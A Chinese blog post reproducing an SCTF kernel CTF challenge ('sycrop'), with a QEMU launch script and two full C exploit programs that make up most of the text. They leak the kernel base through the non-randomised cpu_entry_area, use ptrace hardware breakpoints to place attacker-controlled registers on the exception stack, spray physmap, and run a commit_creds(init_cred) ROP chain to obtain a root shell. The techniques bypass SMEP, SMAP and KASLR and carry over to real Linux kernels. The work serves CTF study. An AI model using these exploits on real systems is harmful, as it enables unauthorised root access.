Sctf内核题目复现

2023-06-22 约 3304 字预计阅读 7 分钟

sycrop

漏洞点

有任意地址读以及可以控制RSP到任意的地方

分析

start.sh

开了smep smap kaslr

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


#!/bin/sh
qemu-system-x86_64 \
    -m 128M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram console=ttyS0 oops=panic panic=1 quiet kaslr" \
    -cpu kvm64,+smep,+smap\
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
    -nographic \
    -no-reboot 

漏洞利用

尝试思路1

地址leak

p0文章里面提到有一处区域在内核中(低版本？)地址是不随机的

在 x86-64 Linux 上，当 CPU 执行某些中断和异常时，它会交换到映射到静态和非随机化虚拟地址的相应堆栈，不同的异常类型使用不同的堆栈。可以在此处找到这些堆栈及其父结构 cpu_entry_area 的简要文档。这些堆栈最常用于从用户态进入内核，但它们也用于内核模式中发生的异常。我们最近看到了 KCTF 条目，其中攻击者利用非随机化的 cpu_entry_area 堆栈来访问内核可访问内存中已知虚拟地址的数据，即使存在 SMAP 和 KASLR。您还可以使用这些堆栈在已知的内核虚拟地址伪造攻击者控制的数据。这是可行的，因为当由于这些异常之一而发生从用户态到内核模式的切换时，攻击者任务的通用寄存器内容被直接推送到这个堆栈上。当内核本身生成中断堆栈表异常并交换到异常堆栈时也会发生这种情况 - 除了在这种情况下，内核 GPR 被推送。一旦处理了异常，这些压入的寄存器稍后将用于恢复内核状态。在用户态触发异常的情况下，寄存器内容从任务堆栈中恢复。

因此可以做leak

通过硬件断点的方法可以leak出栈地址、Kaslr地址、堆地址中的一个，但是毫无疑问leak Kaslr的地址是必须的

控制程序流

由于我们只能控制rsp,所以我们必须考虑将栈迁移到一直的地址并且其中的内容是可控的，一开始没有注意到p0文章中的攻击者任务的通用寄存器内容被直接推送到这个堆栈上。当内核本身生成中断堆栈表异常并交换到异常堆栈时也会发生这种情况,因此我便尝试了ret2dir的方法，关闭了Kaslr由于physmap的值是固定的，因此可以打通，如果是开了Kaslr则需要爆破，爆破位数太搞了，所以就放弃了

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308


// =-=-=-=-=-=-=-= INCLUDE =-=-=-=-=-=-=-=
#define _GNU_SOURCE

#include <assert.h>
#include <fcntl.h>
#include <poll.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <pthread.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>
#include "banzi.h"

// =-=-=-=-=-=-=-= DEFINE =-=-=-=-=-=-=-=



#define GLOBAL_MMAP_ADDR ((char *)(0x12340000))
#define GLOBAL_MMAP_LENGTH (0x2000)

char *buf_buf = (char*)GLOBAL_MMAP_ADDR;

unsigned long user_cs, user_ss, user_eflags, user_sp, user_ip;
size_t  commit_creds = 0x0bb5b0 + 0;
size_t  init_cred = 0x1a4cbf8 + 0;
size_t  pop_rdi_ret = 0x002c9d + 0;
size_t  pop_rax_ret = 0x04e368 + 0;
size_t  pop_rsp_ret = 0x2af92f + 0;
size_t  swapgs_restore_regs_and_return_to_usermode = 0x1000f01+ 0;
size_t  add_rsp_0x18_pop_rbx_pop_rbp_ret = 0x18be788 + 0;
size_t  ret = 0x00038d + 0;
struct typ_cmd {
    uint64_t addr;
    uint64_t val;
};

int vuln_fd,vuln_fd1;
pid_t child;
pid_t trigger;

int sync_pipe[2][2];

// =-=-=-=-=-=-=-= FUNCTION =-=-=-=-=-=-=-=

void get_shell() {
    int uid;
    if (!(uid = getuid())) {
        logi("root get!!");
        execl("/bin/sh", "sh", NULL);
    } else {
        die("gain root failed, uid: %d", uid);
    }
}

size_t user_cs, user_ss, user_rflags, user_sp;

void saveStatus(void)
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

void bind_cpu(int cpu_idx) {
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpu_idx, &my_set);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set)) {
        die("sched_setaffinity: %m");
    }
}

#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))
void create_hbp(pid_t pid, void *addr) {
    logi("create_hbp");
    // Set DR0: HBP address
    if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr) != 0) {
        die("create hbp ptrace dr0: %m");
    }

    /* Set DR7: bit 0 enables DR0 breakpoint. Bit 8 ensures the processor stops
     * on the instruction which causes the exception. bits 16,17 means we stop
     * on data read or write. */
    unsigned long dr_7 = (1 << 0) | (1 << 8) | (1 << 16) | (1 << 17);
    if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr_7) != 0) {
        die("create hbp ptrace dr7: %m");
    }
}

void arb_write(int fd, uint64_t addr, uint64_t val) {
    // struct typ_cmd cmd = {addr, val};
    ioctl(fd,0x7201,addr);
    for(int i = 0;i < 0x40;i++){
        ioctl(fd,0x7202,1);
        ioctl(fd,0x7202,2);
    }
    ioctl(fd,0x7203,0);
    ioctl(fd,0x7203,1);
    ioctl(fd,0x7203,2);
    ioctl(fd,0x7204,val);
}
long long arb_read(int fd, uint64_t addr) {
    long long ret_content = ioctl(fd,0x5555,addr);
    return ret_content;
}

void do_init() {
    logd("do init ...");
    saveStatus();

    vuln_fd = open("/dev/seven", O_RDONLY);
    // vuln_fd1 = open("/dev/seven", O_RDONLY);
    if (vuln_fd < 0) {
        die("open vuln_fd: %m");
    }

    // global mmap
    void *p = mmap(GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {
        die("mmap: %m");
    }

    if (pipe(sync_pipe[0])) {
        die("pipe: %m");
    }
    if (pipe(sync_pipe[1])) {
        die("pipe: %m");
    }
}

size_t  *physmap_spray_arr[16000];
size_t  page_size;
size_t  try_hit;
int     dev_fd;
uint64_t  prepare_kernel_cred = 0;

void getRootShell(void)
{   
    puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");

    if(getuid())
    {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        exit(-1);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m");
    system("/bin/sh");
    exit(0);// to exit the process normally instead of segmentation fault
}
void constructROPChain(size_t *rop,uint64_t kernel_base)
{
    size_t  commit_creds = 0x0bb5b0 + kernel_base;
    size_t  init_cred = 0x1a4cbf8 + kernel_base;
    size_t  pop_rdi_ret = 0x002c9d + kernel_base;
    size_t  pop_rax_ret = 0x04e368 + kernel_base;
    size_t  pop_rsp_ret = 0x2af92f + kernel_base;
    size_t  swapgs_restore_regs_and_return_to_usermode = 0x1000f01+ kernel_base;
    size_t  add_rsp_0x18_pop_rbx_pop_rbp_ret = 0x18be788 + kernel_base;
    size_t  ret = 0x00038d + kernel_base;
    int idx = 0;
    raise(SIGSTOP);
    for (; idx < (page_size / 8 - 0x10); idx++)
        rop[idx] = ret;

    // rop chain
    rop[idx++] = pop_rdi_ret;
    rop[idx++] = init_cred;
    rop[idx++] = commit_creds;
    rop[idx++] = swapgs_restore_regs_and_return_to_usermode;
    rop[idx++] = *(size_t*) "arttnba3";
    rop[idx++] = *(size_t*) "arttnba3";
    rop[idx++] = (size_t) getRootShell;
    rop[idx++] = user_cs;
    rop[idx++] = user_rflags;
    rop[idx++] = user_sp;
    rop[idx++] = user_ss;
}
uint64_t shell_addr = &getRootShell;
void fn_child(uint64_t kernel_base) {
    char *name_buf = (char *)GLOBAL_MMAP_ADDR;
    memset(GLOBAL_MMAP_ADDR, 0, GLOBAL_MMAP_LENGTH);
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) != 0) {
        die("ptrace PTRACE_TRACEME: %m");
    }
    raise(SIGSTOP);
    commit_creds = 0x0bb5b0 + kernel_base;
    init_cred = 0x1a4cbf8 + kernel_base;
    pop_rdi_ret = 0x002c9d + kernel_base;
    pop_rax_ret = 0x04e368 + kernel_base;
    pop_rsp_ret = 0x2af92f + kernel_base;
    swapgs_restore_regs_and_return_to_usermode = 0x1000f01+ kernel_base;
    add_rsp_0x18_pop_rbx_pop_rbp_ret = 0x18be788 + kernel_base;
    ret = 0x00038d + kernel_base;
    logi("init_cred: %llx",init_cred);
    logi("init_cred: %llx",pop_rdi_ret);
    
    __asm__(
        "mov r15, pop_rdi_ret;"
        "mov r14, init_cred;"
        "mov r13, commit_creds;"
        "mov r12, swapgs_restore_regs_and_return_to_usermode;"
        "mov rbp, 0;"
        "mov rbx, 0;"
        "mov r11, shell_addr;"
        "mov r10, user_cs;"
        "mov r9, user_rflags;"
        "mov r8, user_sp;"
        "mov rax,user_ss;"
        "mov rcx,0;"
        "mov rdx, 0;"
        "mov rsi, 0;"
        "mov rdi, 0x12340000;"
        "mov rsi, [rdi];"
    );
    // uname(name_buf);
    // *name_buf = 1;
    return 0;
}

void fn_trigger() {
    logd("trigger: bind trigger to other cpu, e.g. cpu-1");
    bind_cpu(0);

    logd("trigger: modify rcx in cpu-0's `cpu_entry_area` DB_STACK infinitely");
#define CPU_0_cpu_entry_area_DB_STACK_rcx_loc (0xfffffe0000010fd8)
#define OOB_SIZE(x) (x / 8)
    arb_read(vuln_fd,CPU_0_cpu_entry_area_DB_STACK_rcx_loc);
}
int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}
// unsigned long pageOffsetBase = 0xffff888000000000;
// void get_pfn(){
//     void *pg;
// 	unsigned long pginfo = 0xcccccccc;

// 	pg = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_POPULATE|MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
// 	if (pg == MAP_FAILED) {
// 		perror("mmap");
// 		exit(-1);
// 	}

// 	int fd = Open("/proc/self/pagemap", O_RDWR);
// 	if (lseek(fd, ((off_t)pg >> 12) * sizeof(pginfo), SEEK_SET) < 0) {
// 		perror("lseek");
// 		exit(-1);
// 	}

// 	if (read(fd, &pginfo, sizeof(pginfo)) < 0) {
// 		perror("read");
// 		exit(-1);
// 	}

//     unsigned long pfn = pginfo & 0x7fffffffffffff;
// 	unsigned long synonym = (pfn << 12) + pageOffsetBase;

// 	printf("[*] PFN: %lx\n", pfn);
// 	printf("[*] synonym is at: %p\n", (void *)synonym);

// }
int main(void) {
    do_init();
    uint64_t kernel_base = arb_read(vuln_fd,0xfffffe0000002f50);
    kernel_base = kernel_base - 0x1000b49;
    logi("%llx",kernel_base);
    page_size = 0x1000;
    physmap_spray_arr[0] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    constructROPChain(physmap_spray_arr[0],kernel_base);
    printf("%llx\n",physmap_spray_arr[0]);
    puts("[*] Spraying physmap...");
    for (int i = 1; i < 10000; i++)
    {
        physmap_spray_arr[i] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (!physmap_spray_arr[i])
            errExit("oom for physmap spray!");
        memcpy(physmap_spray_arr[i], physmap_spray_arr[0], page_size);
    }
    hexdump(physmap_spray_arr[0],0x1000);
    puts("[*] trigger physmap one_gadget...");
    // get_pfn();
    try_hit = 0xffff888000000000 + 0x200000;
    ioctl(vuln_fd,0x6666,try_hit);
}

尝试思路2

地址leak

思路还是和1一样

劫持程序流

使用p0文章里面的可以将寄存器放到

您还可以使用这些堆栈在已知的内核虚拟地址伪造攻击者控制的数据。这是可行的，因为当由于这些异常之一而发生从用户态到内核模式的切换时，攻击者任务的通用寄存器内容被直接推送到这个堆栈上。当内核本身生成中断堆栈表异常并交换到异常堆栈时也会发生这种情况

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235


// =-=-=-=-=-=-=-= INCLUDE =-=-=-=-=-=-=-=
#define _GNU_SOURCE

#include <assert.h>
#include <fcntl.h>
#include <poll.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <pthread.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>
#include "banzi.h"

// =-=-=-=-=-=-=-= DEFINE =-=-=-=-=-=-=-=



#define GLOBAL_MMAP_ADDR ((char *)(0x12340000))
#define GLOBAL_MMAP_LENGTH (0x2000)

char *buf_buf = (char*)GLOBAL_MMAP_ADDR;

unsigned long user_cs, user_ss, user_eflags, user_sp, user_ip;
size_t  commit_creds = 0x0bb5b0 + 0;
size_t  init_cred = 0x1a4cbf8 + 0;
size_t  pop_rdi_ret = 0x002c9d + 0;
size_t  pop_rax_ret = 0x04e368 + 0;
size_t  pop_rsp_ret = 0x2af92f + 0;
size_t  swapgs_restore_regs_and_return_to_usermode = 0x1000f01+ 0;
size_t  add_rsp_0x18_pop_rbx_pop_rbp_ret = 0x18be788 + 0;
size_t  ret = 0x00038d + 0;
struct typ_cmd {
    uint64_t addr;
    uint64_t val;
};

int vuln_fd,vuln_fd1;
pid_t child;
pid_t trigger;

int sync_pipe[2][2];

// =-=-=-=-=-=-=-= FUNCTION =-=-=-=-=-=-=-=

void get_shell() {
    int uid;
    if (!(uid = getuid())) {
        logi("root get!!");
        execl("/bin/sh", "sh", NULL);
    } else {
        die("gain root failed, uid: %d", uid);
    }
}

size_t user_cs, user_ss, user_rflags, user_sp;

void saveStatus(void)
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

void bind_cpu(int cpu_idx) {
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpu_idx, &my_set);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set)) {
        die("sched_setaffinity: %m");
    }
}

#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))
void create_hbp(pid_t pid, void *addr) {
    logi("create_hbp");
    // Set DR0: HBP address
    if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr) != 0) {
        die("create hbp ptrace dr0: %m");
    }

    /* Set DR7: bit 0 enables DR0 breakpoint. Bit 8 ensures the processor stops
     * on the instruction which causes the exception. bits 16,17 means we stop
     * on data read or write. */
    unsigned long dr_7 = (1 << 0) | (1 << 8) | (1 << 16) | (1 << 17);
    if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr_7) != 0) {
        die("create hbp ptrace dr7: %m");
    }
}
long long arb_read(int fd, uint64_t addr) {
    long long ret_content = ioctl(fd,0x5555,addr);
    return ret_content;
}

void do_init() {
    logd("do init ...");
    saveStatus();

    vuln_fd = open("/dev/seven", O_RDONLY);
    // vuln_fd1 = open("/dev/seven", O_RDONLY);
    if (vuln_fd < 0) {
        die("open vuln_fd: %m");
    }

    // global mmap
    void *p = mmap(GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {
        die("mmap: %m");
    }

    if (pipe(sync_pipe[0])) {
        die("pipe: %m");
    }
    if (pipe(sync_pipe[1])) {
        die("pipe: %m");
    }
}

size_t  *physmap_spray_arr[16000];
size_t  page_size;
size_t  try_hit;
int     dev_fd;
uint64_t  prepare_kernel_cred = 0;

void getRootShell(void)
{   
    puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");

    if(getuid())
    {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        exit(-1);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m");
    system("/bin/sh");
    exit(0);// to exit the process normally instead of segmentation fault
}
uint64_t shell_addr = &getRootShell;
void fn_child(uint64_t kernel_base) {
    char *name_buf = (char *)GLOBAL_MMAP_ADDR;
    memset(GLOBAL_MMAP_ADDR, 0, GLOBAL_MMAP_LENGTH);
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) != 0) {//可以被调试
        die("ptrace PTRACE_TRACEME: %m");
    }
    raise(SIGSTOP);
    commit_creds = 0x0bb5b0 + kernel_base;
    init_cred = 0x1a4cbf8 + kernel_base;
    pop_rdi_ret = 0x002c9d + kernel_base;
    pop_rax_ret = 0x04e368 + kernel_base;
    pop_rsp_ret = 0x2af92f + kernel_base;
    swapgs_restore_regs_and_return_to_usermode = 0x1000f01+ kernel_base;
    add_rsp_0x18_pop_rbx_pop_rbp_ret = 0x18be788 + kernel_base;
    ret = 0x00038d + kernel_base;
    logi("init_cred: %llx",init_cred);
    logi("init_cred: %llx",pop_rdi_ret);
    
    __asm__(
        "mov r15, pop_rdi_ret;"
        "mov r14, init_cred;"
        "mov r13, commit_creds;"
        "mov r12, swapgs_restore_regs_and_return_to_usermode;"
        "mov rbp, 0;"
        "mov rbx, 0;"
        "mov r11, shell_addr;"
        "mov r10, user_cs;"
        "mov r9, user_rflags;"
        "mov r8, user_sp;"
        "mov rax,user_ss;"
        "mov rcx,0;"
        "mov rdx, 0;"
        "mov rsi, 0;"
        "mov rdi, 0x12340000;"
        "mov rsi, [rdi];"
    );
    //mov rsi,[rdi] 触发硬件断点
    // uname(name_buf);
    // *name_buf = 1;
    return 0;
}

int main(){
    do_init();
    uint64_t kernel_base = arb_read(vuln_fd,0xfffffe0000002f50);
    kernel_base = kernel_base - 0x1000b49;
    logi("%llx",kernel_base);
    int child = fork();
    if(child == 0){
        fn_child(kernel_base);
        exit(1);
    }
    else if(child < 0){
        die("fork error");
    }
    if(waitpid(child,NULL,__WALL)<0){//等待子进程触发断点或者产生异常此时程序会停在raise(stop)处
        perror("waitpid");
    }
    logd("create hw_breakpoint for child");
    create_hbp(child, (void *)GLOBAL_MMAP_ADDR);//设置硬件断点
    if(ptrace(PTRACE_CONT,child,NULL,NULL) < 0){//使子程序可以继续运行
        die("ptrace %m");
    }
    if(waitpid(child,NULL,__WALL) < 0){//等待子进程，此时应该停在触发硬件断点的地方
        perror("waitpid");
    }
    if(ptrace(PTRACE_CONT,child,NULL,NULL) < 0){//继续
        die("ptrace %m");
    }
    if(waitpid(child,NULL,__WALL) < 0){//等待子进程，此时应该停在退出的地方
        perror("waitpid");
    }
    if(ptrace(PTRACE_CONT,child,NULL,NULL) < 0){
        die("ptrace %m");
    }
    ioctl(vuln_fd,0x6666,0xfffffe0000010f58);//控制rsp到0xfffffe0000010f58

}

sycrpg

TODO

MoonSpray

TODO

目录

Sctf内核题目复现

sycrop

漏洞点

分析

start.sh

漏洞利用

尝试思路1

地址leak

控制程序流

尝试思路2

地址leak

劫持程序流

sycrpg

MoonSpray